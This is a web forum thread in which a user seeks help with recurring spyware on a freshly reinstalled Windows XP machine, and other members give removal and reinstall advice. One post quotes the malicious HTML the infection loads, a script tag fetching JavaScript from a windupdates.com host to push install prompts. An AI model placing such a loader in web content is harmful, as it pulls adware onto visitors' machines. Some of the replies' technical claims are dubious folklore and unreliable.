• Some users have recently had their accounts hijacked. It seems that the now defunct EVGA forums might have compromised your password there and seems many are using the same PW here. We would suggest you UPDATE YOUR PASSWORD and TURN ON 2FA for your account here to further secure it. None of the compromised accounts had 2FA turned on.
    Once you have enabled 2FA, your account will be updated soon to show a badge, letting other members know that you use 2FA to protect your account. This should be beneficial for everyone that uses FSFT.

VERY wierd spyware problem.

Murderhorn

[H]ard|Gawd
Joined
Apr 21, 2002
Messages
2,018
I just reinstalled windows/formatted again to try to and fix my networking problem. right off a fresh install of windows (only installed networking drivers) upon windows loading Im getting an error saying "IEL.EXE" is not a valid windows 32 program etc. It then opens an IE window, and gives one of those spyware "PROMPT TO INSTALL CLICK OK TO CONFIRM". As soon as you click no, a popup window comes up saying "click yes" and it keeps looping. Have to ctrl-alt-del to get out. Intriqued, I went and got adaware. On a FRESH INSTALL of windows I got 37 counts of spyware. I restarted. As soon as I turned it back on, I ran adaware again. 17 more! Even though I found and deleted the wierd IEL.EXE and lc2.html files loaded into my mydocuments folder, after every restall they re-appear. Any idea wtf is going on?
 
Here is the text of the html file it keeps loading;

Code:
<!-- AUTO PROMPT START -->
<script language="javascript" type="text/javascript" src="http://static.windupdates.com/prompts/a074aa71/a173aa.js"></script>
<script language="javascript" type="text/javascript">self.focus();</script>
<!-- AUTO PROMPT END -->
 
you have an embedded chunk of something nasty that is spewing out spyware like a broken city sewage line.

i recommend taking this to a professional who can ferret that little nasty bit out.
 
Well both drives have had a low-level format. How the hell else can it be in here? It also has a new mainboard and new ram. After the new mainboard and ram I did the format and resintalled windows and I've been having network problems ever since. This appears to be why.
 
sounds like what i call a non-malicious (sp?) virus.

it doesn't do any overt damage, so norton won't see it.
it doesn't send any info over the net, so ad-aware ignores it.
it isn't a brand-name thing, so spybot:s&d doesn't look for it.
hijackthis *might* see it. *might*.

it just sits there, spewing out sh*t that clogs your comp until the system overloads and dies, having been crushed to death by the weight of a hundred thousand spyware bits.

it transmits over a network and loves to breed.

i don't have a name for this particular f*cker, but it is very nasty indeed and would likely be a deliberate infestation by someone who is p*ssed off at you for some reason... i would also suspect industrial espionage if that were a possibility.
 
In theory if I had some way to force a change of my IP, and in reinstalled again, it should fix it?
 
Did you connect from behind a firewall, or directly? Using XP? Got SP2? It sounds like you got nailed as soon as you connected (yes, it doesn't take long).
IF you have XP, and IF you don't have SP2, the best thing to do is to make a CD with SP2 slipstreamed. I'm assuming a lot here, but that's what it sounds like...let us know.
 
Also I cant run windowsupdate. As soon as I do whatever this is locks out most of my internet access.
 
O[H]-Zone said:
Did you connect from behind a firewall, or directly? Using XP? Got SP2? It sounds like you got nailed as soon as you connected (yes, it doesn't take long).
IF you have XP, and IF you don't have SP2, the best thing to do is to make a CD with SP2 slipstreamed. I'm assuming a lot here, but that's what it sounds like...let us know.

Im on a college network. Didnt even get a chance to do windows udpate. When I try to download SP2 directly I get a DNS error, but Im pretty sure its this bastard software blocking me.
 
what happens if you try to go on the internet?

...and can you post an image of the desktop of this computer?
 
If you do a fresh install of WinXP with SP2 slipstreamed, "bastard software" shouldn't be able to infect you. Make a slipstreamed CD, and reinstall Windows.
 
I can get on the net, because I havnt tried to do windows updates. Last two installs I tried to do updates, and what happens is it'll let me on the net for like 30 seconds after windows restarts, and then its done. No more net after that.

Net is working fine now, but every few minutes Im getting like 30 spyware programs.

Tomarow my manager is gonna drop off a new copy of norton which he'll load with updates, and SP2 on cd's. Gonna try reinstalling with the net cable undone, install those, then see what happens.
 
That should do it. Once you have SP2 installed (before you connect to the net), you'll be much better protected.
 
starhawk said:
image of the desktop on this thing?

One sec. Hope I dont infest photobucket uploading it haha.

Edit - Cant get it. The stupid thing is hiding itself well now.
 
Murderhorn said:
Well both drives have had a low-level format. How the hell else can it be in here? It also has a new mainboard and new ram. After the new mainboard and ram I did the format and resintalled windows and I've been having network problems ever since. This appears to be why.

Get a copy or make a copy of The Ultimate Boot CD and run Autoclave on the disks and then re-install. Autoclave (the 25pass version) is the same as what the government uses to wipe their drives. It really gets rid of everything. A one pass low level format really doesn't get rid of everything like one would think. I just did it to my laptops drive and man what a HUGE difference!
 
Murderhorn said:
Also I cant run windowsupdate. As soon as I do whatever this is locks out most of my internet access.

This might be a network driver/component issue. Make sure you have all the drivers and services needed installed.

(I'm sure you do, but it never hurts to double check.)
;)
 
So do you have this problem after clean install when your PC doesn't have a network cable plugged in?

Three things...

1. Is this an OEM or retail CD or is this a *special* windows disk..I have seen *special* windows disks with stuff embedded in them.

2. I have seen, and this was recent, a factory stamped motherboard driver CD that had a virus/spyware in it. It did some crazy stuff to a PC, one of which brings me to my next point...

3. What does your hosts file look like...i have seen some (including the afforementioned software) go in and route all requests to any antivirus website or windows update to 127.0.0.1. There should be nothing in your hosts file unless you put it there, especially just after a windows load.
 
ummm backup registry before you make any major changes..

make sure you clear the contents of the %temp% folder
just do start > run > %temp% and delete the entire contents, you might have to do this from safe mode if you get an error.

i would also check msconfig startup tab for weird entries
while in msconfig go to the services tab and check the hide microsoft services box and see whats there as well.

check your /winnt/system32 folder for weird shit as well, make sure you check out the app name on like liutilities.com before you go on a click spree.

download an app called ccleaner and run it, also run its registry issues scanner as well, have it fix all of the errors it finds.


what antispyware apps have you run?

first thing that came to mind to me here was to run hijack this.
after that i would try cwshredder
then spysweeper
then spybot
then aaw
then bhodemon

let me know your progress, id love to help further if anything ive listed did not work.
 
If you have rogue code already installed on the machine (especially as admin), the only way to trust it again is to format it and reinstall.

A normal format will do, as part of an OS install will wpork, unless you plan on using data recovery software to try and restore the virus onto the system (but if you do that on purpose, you deserve what you get:)). If you want to make sure an admin can't install data recovery apps and restore the virus, then write zeroes to the drive as someone else said, though if you have and admin like that you have worse problems...

When installing the OS, be sure to disconnect from the network, and make sure that the built in firewall gets enabled before even thinking about connecting. You should then be fine to connect and get updates.
 
Nah, it's windupdate, a well known spyware and adware combo.
Here's the deal: it spreads through networks.
There is only one way to fix this:
Format
Install XP without network plugged in.
Install SP2 from cd
That *should* be enough, but I'd install like zonealarm or something like it as well. Keep your adware scanners up to date too.
 
Back
Top